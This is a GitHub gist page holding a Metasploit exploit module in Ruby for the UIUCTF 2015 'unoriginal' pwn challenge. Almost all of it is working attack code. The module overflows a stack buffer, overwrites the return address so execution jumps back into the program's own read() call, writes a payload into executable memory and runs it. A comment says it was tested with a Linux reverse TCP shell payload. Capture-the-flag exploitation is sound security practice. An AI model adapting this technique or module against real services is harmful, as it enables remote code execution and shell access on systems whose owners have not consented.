-
-
Save johnjohnsp1/6aa358c0d9317ac9972e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit4 < Msf::Exploit::Remote | |
| include Msf::Exploit::Remote::Tcp | |
| def initialize | |
| super( | |
| 'Name' => 'uiuctf unoriginal', | |
| 'Description' => %q{ | |
| This module exploits the UIUCTF 2015 pwn - unoriginal challenge. | |
| }, | |
| 'Author' => 'jgor', | |
| 'Arch' => ARCH_X86, | |
| 'Platform' => 'linux', | |
| 'License' => MSF_LICENSE, | |
| 'Targets' => | |
| [ | |
| [ 'Automatic', {} ], | |
| ] | |
| ) | |
| register_options( | |
| [ | |
| Opt::RPORT(1235) | |
| ], | |
| self.class | |
| ) | |
| end | |
| def exploit | |
| dest = 0x08049748 # start of .data | |
| read_gadget = 0x0804843f # read() call within func() | |
| fd = 0 | |
| read_count = payload.encoded.length + 5 | |
| connect | |
| buf = '' | |
| # overflow buffer | |
| buf << "\x41" * 13 | |
| # set up frame pointer | |
| buf << [dest-4].pack('L') | |
| # overwrite RET -> jump to existing read() call | |
| buf << [read_gadget].pack('L') | |
| # set up args to read() | |
| buf << [fd].pack('N') # file descriptor 0 | |
| buf << [dest].pack('L') # start of .data (mem range is rwx) | |
| buf << [read_count].pack('N') # count to read | |
| sock.put(buf) | |
| buf = '' | |
| # return to payload 4 bytes ahead | |
| buf << [dest+4].pack('L') | |
| # msf payload (tested with linux/x86/shell/reverse_tcp) | |
| buf << payload.encoded | |
| sock.put(buf) | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment